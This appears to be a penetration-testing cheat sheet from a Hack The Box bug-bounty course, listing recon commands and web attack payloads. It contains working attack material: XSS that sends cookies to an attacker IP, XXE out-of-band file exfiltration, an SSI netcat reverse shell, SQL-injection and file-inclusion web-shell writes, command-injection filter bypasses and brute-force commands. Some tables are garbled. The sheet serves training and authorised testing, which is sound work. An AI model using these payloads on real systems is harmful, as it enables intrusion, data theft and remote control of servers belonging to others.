# CBBH {% file src="" %} ## **Web Requests** #### cURL
CommandDescription
curl -s -O inlanefreight.com/index.htmlDownload file
curl -k https://inlanefreight.comSkip HTTPS (SSL) certificate validation
curl inlanefreight.com -vPrint full HTTP request/response details
curl -I https://www.inlanefreight.comSend HEAD request (only prints response headers)
curl -i https://www.inlanefreight.comPrint response headers and response body
curl https://www.inlanefreight.com -A 'Mozilla/5.0'Set User-Agent header
curl -u admin:admin http://<SERVER_IP>:<PORT>/Set HTTP basic authorization credentials
curl http://admin:admin@<SERVER_IP>:<PORT>/Pass HTTP basic authorization credentials in the URL
curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' http://<SERVER_IP>:<PORT>/Set request header
curl 'http://<SERVER_IP>:<PORT>/search.php?search=le'Pass GET parameters
curl -X POST -d 'username=admin&password=admin' http://<SERVER_IP>:<PORT>/Send POST request with POST data
curl -b 'PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1' http://<SERVER_IP>:<PORT>/Set request cookies
curl -X POST -d '{"search":"london"}' -H 'Content-Type: application/json' http://<SERVER_IP>:<PORT>/search.phpSend POST request with JSON data
#### APIs
CommandDescription
curl http://<SERVER_IP>:<PORT>/api.php/city/londonRead entry
curl -s http://<SERVER_IP>:<PORT>/api.php/city/ | jqRead all entries
curl -X POST http://<SERVER_IP>:<PORT>/api.php/city/ -d '{"city_name":"HTB_City", "country_name":"HTB"}' -H 'Content-Type: application/json'Create (add) entry
curl -X PUT http://<SERVER_IP>:<PORT>/api.php/city/london -d '{"city_name":"New_HTB_City", "country_name":"HTB"}' -H 'Content-Type: application/json'Update (modify) entry
curl -X DELETE http://<SERVER_IP>:<PORT>/api.php/city/New_HTB_CityDelete entry
## **Information Gathering** #### WHOIS | Command | Description | | ---------------------------- | ----------------------------------------- | | `nslookup ` | Identify A record for the target domain. | | `export TARGET="domain.tld"` | Assign target to an environment variable. | | `whois $TARGET` | WHOIS lookup for the target. | #### DNS Enumeration
CommandDescription
nslookup $TARGETIdentify the A record for the target domain.
nslookup -query=A $TARGETIdentify the A record for the target domain.
dig <TARGET> @<nameserver/IP>Identify the A record for the target domain.
dig a $TARGET @<nameserver/IP>Identify the A record for the target domain.
nslookup -query=PTR <IP>Identify the PTR record for the target IP address.
dig -x <IP> @<nameserver/IP>Identify the PTR record for the target IP address.
nslookup -query=ANY $TARGETIdentify ANY records for the target domain.
dig any $TARGET @<nameserver/IP>Identify ANY records for the target domain.
nslookup -query=TXT $TARGETIdentify the TXT records for the target domain.
dig txt $TARGET @<nameserver/IP>Identify the TXT records for the target domain.
nslookup -query=MX $TARGETIdentify the MX records for the target domain.
dig mx $TARGET @<nameserver/IP>Identify the MX records for the target domain.
#### Passive Subdomain Enumeration
Resource/CommandDescription
VirusTotalhttps://www.virustotal.com/gui/home/url
Censyshttps://censys.io/
Crt.shhttps://crt.sh/
curl -s https://sonar.omnisint.io/subdomains/{domain} | jq -r '.[]' sort -uAll subdomains for a given domain.
curl -s https://sonar.omnisint.io/tlds/{domain} jq -r '.[]' sort -uAll TLDs found for a given domain.
curl -s https://sonar.omnisint.io/all/{domain} jq -r '.[]' sort -uAll results across all TLDs for a given domain.
curl -s https://sonar.omnisint.io/reverse/{ip} jq -r '.[]' sort -uReverse DNS lookup on IP address.
curl -s https://sonar.omnisint.io/reverse/{ip}/{mask} jq -r '.[]' sort -uReverse DNS lookup of a CIDR range.
curl -s "https://crt.sh/?q=${TARGET}&output=json" jq -r '.[] "\(.name_value)\n\(.common_name)"' sort -u
#### Certificate Transparency. {% code overflow="wrap" %} ```bash cat sources.txt \| while read source; do theHarvester -d "${TARGET}" -b $source -f "${source}-${TARGET}";done ``` {% endcode %} Searching for subdomains and other information on the sources provided in the source.txt list. {% code overflow="wrap" %} ```bash curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u ``` {% endcode %} This command fetches JSON-formatted data from `crt.sh` for `example.com` (the `%` is a wildcard), extracts domain names using `jq`, removes any wildcard prefixes (`*.`) with `sed`, and finally sorts and deduplicates the results. #### Passive Infrastructure Identification
Resource/CommandDescription
Netcrafthttps://www.netcraft.com/
WayBackMachinehttp://web.archive.org/
WayBackURLshttps://github.com/tomnomnom/waybackurls
waybackurls -dates https://$TARGET > waybackurls.txtCrawling URLs from a domain with the date it was obtained.
#### Active Infrastructure Identification
Resource/CommandDescription
curl -I "http://${TARGET}"Display HTTP headers of the target webserver.
whatweb -a https://www.facebook.com -vTechnology identification.
Wappalyzerhttps://www.wappalyzer.com/
wafw00f -v https://$TARGETWAF Fingerprinting.
Aquatonehttps://github.com/michenriksen/aquatone
cat subdomain.list aquatone -out ./aquatone -screenshot-timeout 1000Makes screenshots of all subdomains in the
subdomain.list.
#### Active Subdomain Enumeration
Resource/CommandDescription
HackerTargethttps://hackertarget.com/zone-transfer/
SecListshttps://github.com/danielmiessler/SecLists
nslookup -type=any -query=AXFR $TARGET nameserver.target.domainZone Transfer using Nslookup against the target domain and its nameserver.
gobuster dns -q -r "${NS}" -d "${TARGET}" -w "${WORDLIST}" -p ./patterns.txt -o "gobuster_${TARGET}.txt"Bruteforcing subdomains.
#### Virtual Hosts
Resource/CommandDescription
curl -s http://192.168.10.10 -H "Host: randomtarget.com"Changing the HOST HTTP header to request a specific domain.
cat ./vhosts.list while read vhost;do echo "\n********\nFUZZING: ${vhost}\n********";curl -s -I http://<IP address> -H "HOST: ${vhost}.target.domain" | grep "Content-Length: ";doneBruteforcing for possible virtual hosts on the target domain.
ffuf -w ./vhosts -u http://<IP address> -H "HOST: FUZZ.target.domain" -fs 612Bruteforcing for possible virtual hosts on the target domain using ffuf.
```bash gobuster vhost -u http://192.0.2.1 -w hostnames.txt ``` #### Crawling
Resource/CommandDescription
ffuf -recursion -recursion-depth 1 -u http://192.168.10.10/FUZZ -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txtDiscovering files and folders that cannot be spotted by browsing the website.
ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://www.target.domain/FOLDERS/WORDLISTEXTENSIONSMutated bruteforcing against the target web server.
Here's a basic Scrapy spider example to extract links from `example.com`: ```python import scrapy class ExampleSpider(scrapy.Spider): name = "example" start_urls = ['http://example.com/'] def parse(self, response): for link in response.css('a::attr(href)').getall(): if any(link.endswith(ext) for ext in self.interesting_extensions): yield {"file": link} elif not link.startswith("#") and not link.startswith("mailto:"): yield response.follow(link, callback=self.parse) ``` {% code overflow="wrap" %} ```bash jq -r '.[] | select(.file != null) | .file' example_data.json | sort -u ``` {% endcode %} ## **Attacking Web Applications with Ffuf**
CommandDescription
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZDirectory Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZExtension Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.phpPage Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -vRecursive Fuzzing
ffuf -w wordlist.txt:FUZZ -u https://FUZZ.hackthebox.eu/Subdomain Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb' -fs xxxVHost Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php?FUZZ=key -fs xxxParameter Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxxParameter Fuzzing
ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxxValue Fuzzing
#### Wordlists
CommandDescription
/opt/useful/seclists/Discovery/Web-Content/directory-list-2.3-small.txtDirectory Wordlist
/opt/useful/seclists/Discovery/Web-Content/web-extensions.txtExtensions Wordlist
/opt/useful/seclists/Discovery/DNS/subdomains-top1million-5000.txtDomain Wordlist
/opt/useful/seclists/Discovery/Web-Content/burp-parameter-names.txtParameters Wordlist
#### Misc
CommandDescription
sudo sh -c 'echo "SERVER_IP academy.htb" >> /etc/hosts'Add DNS entry
for i in $(seq 1 1000); do echo $i >> ids.txt; doneCreate Sequence Wordlist
## **JavaScript Deobfuscation** | **Website** | **Description** | | ------------------------------------------- | --------------- | | [JS Console](https://jsconsole.com/) | | | [Prettier](https://prettier.io/playground/) | | | [Beautifier](https://beautifier.io/) | | | [JSNice](http://www.jsnice.org/) | | | [JSCompress](https://jscompress.com/) | Minify JS code | ## **Cross-Site Scripting (XSS)**
CodeDescription
<script>alert(window.origin)</script>Basic XSS Payload
<plaintext>Basic XSS Payload
<script>print()</script>Basic XSS Payload
<img src="" onerror=alert(window.origin)>HTML-based XSS Payload
<script>document.body.style.background = "#141d2b"</script>Change Background Color
<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>Change Background Image
<script>document.title = 'HackTheBox Academy'</script>Change Website Title
<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script>Overwrite website's main body
<script>document.getElementById('urlform').remove();</script>Remove certain HTML element
<script src="http://OUR_IP/script.js"></script>Load remote script
<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>Send Cookie details to us
python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"Run xsstrike on a url parameter
## **SQL Injection** #### MySQL
CommandDescription
General
mysql -u root -h docker.hackthebox.eu -P 3306 -plogin to mysql database
SHOW DATABASESList available databases
USE usersSwitch to database
Tables
CREATE TABLE logins (id INT, ...)Add a new table
SHOW TABLESList available tables in current database
DESCRIBE loginsShow table properties and columns
INSERT INTO table_name VALUES (value_1,..)Add values to table
INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)Add values to specific columns in a table
UPDATE table_name SET column1=newvalue1, ... WHERE <condition>Update table values
Columns
SELECT * FROM table_nameShow all columns in a table
SELECT column1, column2 FROM table_nameShow specific columns in a table
DROP TABLE loginsDelete a table
ALTER TABLE logins ADD newColumn INTAdd new column
ALTER TABLE logins RENAME COLUMN newColumn TO oldColumnRename column
ALTER TABLE logins MODIFY oldColumn DATEChange column datatype
ALTER TABLE logins DROP oldColumnDelete column
Output
SELECT * FROM logins ORDER BY column_1Sort by column
SELECT * FROM logins ORDER BY column_1 DESCSort by column in descending order
SELECT * FROM logins ORDER BY column_1 DESC, id ASCSort by two-columns
SELECT * FROM logins LIMIT 2Only show first two results
SELECT * FROM logins LIMIT 1, 2Only show first two results starting from index 2
SELECT * FROM table_name WHERE <condition>List results that meet a condition
SELECT * FROM logins WHERE username LIKE 'admin%'List results where the name is similar to a given string
#### MySQL Operator Precedence * Division (`/`), Multiplication (`*`), and Modulus (`%`) * Addition (`+`) and Subtraction (`-`) * Comparison (`=`, `>`, `<`, `<=`, `>=`, `!=`, `LIKE`) * NOT (`!`) * AND (`&&`) * OR (`||`) #### SQL Injection
PayloadDescription
Auth Bypass
admin' or '1'='1Basic Auth Bypass
admin')-- -Basic Auth Bypass With comments
Auth Bypass Payloads
Union Injection
' order by 1-- -Detect number of columns using order by
cn' UNION select 1,2,3-- -Detect number of columns using Union injection
cn' UNION select 1,@@version,3,4-- -Basic Union injection
UNION select username, 2, 3, 4 from passwords-- -Union injection for 4 columns
DB Enumeration
SELECT @@versionFingerprint MySQL with query output
SELECT SLEEP(5)Fingerprint MySQL with no output
cn' UNION select 1,database(),2,3-- -Current database name
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -List all databases
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -List all tables in a specific database
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -List all columns in a specific table
cn' UNION select 1, username, password, 4 from dev.credentials-- -Dump data from a table in another database
Privileges
cn' UNION SELECT 1, user(), 3, 4-- -Find current user
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -Find if user has admin privileges
cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -Find if all user privileges
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -Find which directories can be accessed through MySQL
File Injection
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -Read local file
select 'file written successfully!' into outfile '/var/www/html/proof.txt'Write a string to a local file
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -Write a web shell into the base web directory
### **SQLMap**
CommandDescription
sqlmap -hhView the advanced help menu
sqlmap -u "http://www.example.com/vuln.php?id=1" --batchRun SQLMap without asking for user input
sqlmap 'http://www.example.com/' --data 'uid=1&name=test'SQLMap with POST request
sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'POST request specifying an injection point with an asterisk
sqlmap -r req.txtPassing an HTTP request file to SQLMap
sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'Specifying a cookie header
sqlmap -u www.target.com --data='id=1' --method PUTSpecifying a PUT request
sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txtStore traffic to an output file
sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batchSpecify verbosity level
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"Specifying a prefix or suffix
sqlmap -u www.example.com/?id=1 -v 3 --level=5Specifying the level and risk
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dbaBasic DB enumeration
sqlmap -u "http://www.example.com/?id=1" --tables -D testdbTable enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surnameTable/row enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"Conditional enumeration
sqlmap -u "http://www.example.com/?id=1" --schemaDatabase schema enumeration
sqlmap -u "http://www.example.com/?id=1" --search -T userSearching for data
sqlmap -u "http://www.example.com/?id=1" --passwords --batchPassword enumeration and cracking
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"Anti-CSRF token bypass
sqlmap --list-tampersList all tamper scripts
sqlmap -u "http://www.example.com/case1.php?id=1" --is-dbaCheck for DBA privileges
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"Reading a local file
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"Writing a file
sqlmap -u "http://www.example.com/?id=1" --os-shellSpawning an OS shell
## **Command Injections** #### Injection Operators
Injection OperatorInjection CharacterURL-Encoded CharacterExecuted Command
Semicolon;%3bBoth
New Line%0aBoth
Background&%26Both (second output generally shown first)
Pipe|%7cBoth (only second output is shown)
AND&&%26%26Both (only if first succeeds)
OR||%7c%7cSecond (only if first fails)
Sub-Shell``%60%60Both (Linux-only)
Sub-Shell$()%24%28%29Both (Linux-only)
*** #### Linux #### Filtered Character Bypass
CodeDescription
printenvCan be used to view all environment variables
Spaces
%09Using tabs instead of spaces
${IFS}Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $())
{ls,-la}Commas will be replaced with spaces
Other Characters
${PATH:0:1}Will be replaced with /
${LS_COLORS:10:1}Will be replaced with ;
$(tr '!-}' '"-~'<<<[)Shift character by one ([ -> \)
*** #### Blacklisted Command Bypass | Code | Description | | ------------------------------------------------------------ | ----------------------------------- | | **Character Insertion** | | | `'` or `"` | Total must be even | | `$@` or `\` | Linux only | | **Case Manipulation** | | | `$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")` | Execute command regardless of cases | | `$(a="WhOaMi";printf %s "${a,,}")` | Another variation of the technique | | **Reversed Commands** | | | `echo 'whoami' \| rev` | Reverse a string | | `$(rev<<<'imaohw')` | Execute reversed command | | **Encoded Commands** | | | `echo -n 'cat /etc/passwd \| grep 33' \| base64` | Encode a string with base64 | | `bash<<<$(base64 -d<<CodeDescriptionGet-ChildItem Env:Can be used to view all environment variables - (PowerShell)Spaces%09Using tabs instead of spaces%PROGRAMFILES:~10,-5%Will be replaced with a space - (CMD)$env:PROGRAMFILES[10]Will be replaced with a space - (PowerShell)Other Characters%HOMEPATH:~0,-17%Will be replaced with \ - (CMD)$env:HOMEPATH[0]Will be replaced with \ - (PowerShell) *** #### Blacklisted Command Bypass
CodeDescription
Character Insertion
' or "Total must be even
^Windows only (CMD)
Case Manipulation
WhoAmicharacter with odd cases
Reversed Commands
"whoami"[-1..-20] -join ''Reverse a string
iex "$('imaohw'[-1..-20] -join '')"Execute reversed command
Encoded Commands
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))Encode a string with base64
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"Execute b64 encoded string
#### Separator Characters > List of injection characters and matching URL encoded as wordlist of possible separators: ```bash ; %3b \n %0a & %26 | %7c && %26%26 || %7c%7c `` %60%60 $() %24%28%29 ``` #### Obfuscated Commands > List of commands obfuscated as wordlist to test possible WAF filter bypass: ```bash uname u'n'a'm'e ${uname} $(uname) {uname} $(rev<<<'emanu') bash<<<$(base64 -d<< Character Injection - Before/After Extension to generate list of possible filenames to bypass file upload filters on white or black listings. ```bash for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do for ext in '.php' '.php3' '.php4' '.php5' '.php7' '.php8' '.pht' '.phar' '.phpt' '.pgif' '.phtml' '.phtm'; do echo "shell$char$ext.jpg" >> filenames_wordlist.txt echo "shell$ext$char.jpg" >> filenames_wordlist.txt echo "shell.jpg$char$ext" >> filenames_wordlist.txt echo "shell.jpg$ext$char" >> filenames_wordlist.txt done done ``` #### Web Shells
Web ShellDescription
<?php file_get_contents('/etc/passwd'); ?>Basic PHP File Read
<?php system('hostname'); ?>Basic PHP Command Execution
<?php system($_REQUEST['cmd']); ?>Basic PHP Web Shell
<% eval request('cmd') %>Basic ASP Web Shell
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.phpGenerate PHP reverse shell
PHP Web ShellPHP Web Shell
PHP Reverse ShellPHP Reverse Shell
Web/Reverse ShellsSeclists Web Shells
https://www.revshells.com/Automated reverse shell
#### Bypasses | **Command** | **Description** | | ------------------------------------------------------------------------------------------------------------------------------------------ | -------------------------------------------- | | **Blacklist Bypass** | | | `shell.phtml` | Uncommon Extension | | `shell.pHp` | Case Manipulation | | [PHP Extensions](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst) | List of PHP Extensions | | [ASP Extensions](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP) | List of ASP Extensions | | [Web Extensions](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt) | List of Web Extensions | | **Whitelist Bypass** | | | `shell.jpg.php` | Double Extension | | `shell.php.jpg` | Reverse Double Extension | | `%20`, `%0a`, `%00`, `%0d0a`, `/`, `.\`, `.`, `…` | Character Injection - Before/After Extension | | **Content/Type Bypass** | | | [Web Content-Types](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt) | List of Web Content-Types | | [Content-Types](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-all-content-types.txt) | List of All Content-Types | | [File Signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) | List of File Signatures/Magic Bytes | #### Limited Uploads | **Potential Attack** | **File Types** | | -------------------- | ----------------------- | | `XSS` | HTML, JS, SVG, GIF | | `XXE`/`SSRF` | XML, SVG, PDF, PPT, DOC | | `DoS` | ZIP, JPG, PNG | ## **Login Brute Forcing** ```bash hydra [-l LOGIN|-L FILE] [-p PASS|-P FILE] [-C FILE] -m MODULE [service://server[:PORT][/OPT]] medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT] medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh medusa -h www.example.com -U users.txt -P passwords.txt -M http -m GET ```
CommandDescription
hydra -C wordlist.txt SERVER_IP -s PORT http-get /Basic Auth Brute Force
hydra -L wordlist.txt -P wordlist.txt -u -f SERVER_IP -s PORT http-get /Basic Auth Brute Force
hydra -l admin -P wordlist.txt -f SERVER_IP -s PORT http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"Login Form Brute Force
hydra -L bill.txt -P william.txt -u -f ssh://SERVER_IP:PORT -t 4SSH Brute Force
cupp -iCreating Custom Password Wordlist
sed -ri '/^.{,7}$/d' william.txtRemove Passwords Shorter Than 8
sed -ri '/[!-/:-@\[-`\{-~]+/!d' william.txtRemove Passwords With No Special Chars
sed -ri '/[0-9]+/!d' william.txtRemove Passwords With No Numbers
./username-anarchy Bill Gates > bill.txtGenerate Usernames List
## Server side request forgery SSRF #### **Protocols** {% code overflow="wrap" %} ```http http://127.0.0.1/ file:///etc/passwd gopher://dateserver.htb:80/_POST%20/admin.php%20HTTP%2F1.1%0D%0AHost:%20dateserver.htb%0D%0AContent-Length:%2013%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0A%0D%0Aadminpw%3Dadmin ``` {% endcode %}
CommandDescription
curl -i -s "http://<TARGET IP>/load?q=http://<VPN/TUN Adapter IP>:8080"Testing for SSRF vulnerability
curl -i -s "http://<TARGET IP>/load?q=http://<VPN/TUN Adapter IP>:9090/index.html"Retrieving a remote file through the target application (HTTP Schema)
curl -i -s "http://<TARGET IP>/load?q=file:///etc/passwd"Retrieving a local file through the target application (File Schema)
for port in {1..65535};do echo $port >> ports.txt;doneGenerating a wordlist of possible ports
ffuf -w ./ports.txt:PORT -u "http://<TARGET IP>/load?q=http://127.0.0.1:PORT" -fs 30Fuzzing for ports on the internal interface
curl -i -s "http://<TARGET IP>/load?q=http://127.0.0.1:5000"Interacting with the internal interface on the discovered port
curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=index.html"Interacting with the internal application
curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http://127.0.0.1:1"Discovering web application listening in on localhost
curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:1"Modifying the URL to bypass the error message
curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=file:://///proc/self/environ" -o -Requesting to disclose the /proc/self/environ file on the internal application
curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=file:://///app/internal_local.py"Retrieving a local file through the target application
curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=whoami"Confirming remote code exeuction on the remote host
## SSI Injection #### SSI Directive Payload Description
Print variables<!--#printenv -->
Change config<!--#config errmsg="Error!" -->
Print specific variable<!--#echo var="DOCUMENT_NAME" var="DATE_LOCAL" -->
Execute command<!--#exec cmd="whoami" -->
Date<!--#echo var="DATE_LOCAL" -->
Include web file<!--#include virtual="index.html" -->
Reverse Shell<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo /bin/bash 1>/tmp/foo;rm /tmp/foo" -->
## SSTI
CommandDescription
${{<%[%'"}}%.Test String
${7*7}Spring payload
{{_self.env.display("TEST"}}Twig payload
{{config.items()}}Jinja2 basic injection
{{ [].class.base.subclasses() }}Jinja2 dump all classes payload
{% import os %}{{os.system('whoami')}}Tornado payload
{{7*'7'}}Confirming Jinja2 backend
./tplmap.py -u 'http://<TARGET IP>:<PORT>/execute?cmd'Automating with tplmap
## XSLT Injection 
<xsl:template>	 # This element indicates an XSL template. It can contain a match attribute that contains a path in the XML-document that the template applies to
<xsl:value-of>	 # This element extracts the value of the XML node specified in the select attribute
<xsl:for-each>	 # This elements enables looping over all XML nodes specified in the select attribute
<xsl:sort>	 # This element specifies the node to sort elements in a for loop by in the select argument. Additionally, a sort order may be specified in the order argument
<xsl:if>	 # This element can be used to test for conditions on a node. The condition is specified in the test argument

# Injection Payloads
# Information Disclosure
<xsl:value-of select="system-property('xsl:version')" />
<xsl:value-of select="system-property('xsl:vendor')" />
<xsl:value-of select="system-property('xsl:vendor-url')" />
<xsl:value-of select="system-property('xsl:product-name')" />
<xsl:value-of select="system-property('xsl:product-version')" />

# LFI
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')" />
<xsl:value-of select="php:function('file_get_contents','/etc/passwd')" />

# RCE
<xsl:value-of select="php:function('system','id')" />
## XXE
CodeDescription
<!ENTITY xxe SYSTEM "http://localhost/email.dtd">Define External Entity to a URL
<!ENTITY xxe SYSTEM "file:///etc/passwd">Define External Entity to a file path
<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">Read PHP source code with base64 encode filter
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">Reading a file through a PHP error
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">Reading a file OOB exfiltration
## **File Inclusion** ### Local File Inclusion LFI | **Command** | **Description** | | ------------------------------------------------------------------------------------------------- | --------------------------------------------------------- | | `/etc/passwd` | Basic LFI | | `../../../../etc/passwd` | LFI with path traversal | | `....//....//....//....//etc/passwd` | Bypass basic path traversal filter | | `%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64` | Bypass filters with URL encoding | | `/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]` | Bypass appended extension with path truncation (obsolete) | | `../../../../etc/passwd%00` | Bypass appended extension with null byte (obsolete) | | `php://filter/read=convert.base64-encode/resource=config` | Read PHP with base64 filter | ### Remote Code Execution | **Command** | **Description** | | --------------------------------------------------------------------------------------------------------------------------- | ------------------------------------- | | **PHP Wrappers** | | | `data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id` | RCE with data wrapper | | `curl -s -X POST --data '' "http://:/index.php?language=php://input&cmd=id"` | RCE with input wrapper | | `http://:/index.php?language=expect://id` | RCE with expect wrapper | | **RFI** | | | `echo '' > shell.php && python3 -m http.server ` | Host web shell | | `/index.php?language=http://:/shell.php&cmd=id` | Include remote PHP web shell | | **LFI + Upload** | | | `echo 'GIF8' > shell.gif` | Create malicious image | | `/index.php?language=./profile_images/shell.gif&cmd=id` | RCE with malicious uploaded image | | `echo '' > shell.php && zip shell.jpg shell.php` | Create malicious zip archive 'as jpg' | | `/index.php?language=zip://shell.zip%23shell.php&cmd=id` | RCE with malicious uploaded zip | | `php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg` | Create malicious phar 'as jpg' | | `/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id` | RCE with malicious uploaded phar | | **Log Poisoning** | | | `/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd` | Read PHP session parameters | | `%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E` | Poison PHP session with web shell | | `/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id` | RCE through poisoned PHP session | | `curl -s "http://:/index.php" -A ''` | Poison server log | | `/var/log/apache2/access.log&cmd=id` | RCE through poisoned PHP session | | `C:\xampp\apache\logs\` | Apache log files on windows *XAMPP* | ```powershell # PHP Wrappers php://filter/read=string.rot13/resource=index.php php://filter/convert.iconv.utf-8.utf-16/resource=index.php php://filter/convert.base64-encode/resource=index.php pHp://FilTer/convert.base64-encode/resource=index.php php://filter/zlib.deflate/convert.base64-encode/resource=index.php data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=dir expect://id expect://ls ``` #### Misc | [LFI Wordlists](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI) | | | -------------------------------------------------------------------------------------------------------------------------------------------------------- | - | | [LFI-Jhaddix.txt](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt) | | | [Webroot path wordlist for Linux](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt) | | | [Webroot path wordlist for Windows](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt) | | | [Server configurations wordlist for Linux](https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux) | | | [Server configurations wordlist for Windows](https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Windows) | | ### File Inclusion Functions
FunctionRead ContentExecuteRemote URL
PHP
include()/include_once()YesYesYes
require()/require_once()YesYesNo
file_get_contents()YesNoYes
fopen()/file()YesNoNo
NodeJS
fs.readFile()YesNoNo
fs.sendFile()YesNoNo
res.render()YesYesNo
Java
includeYesNoNo
importYesYesYes
.NET
@Html.Partial()YesNoNo
@Html.RemotePartial()YesNoYes
Response.WriteFile()YesNoNo
includeYesYesYes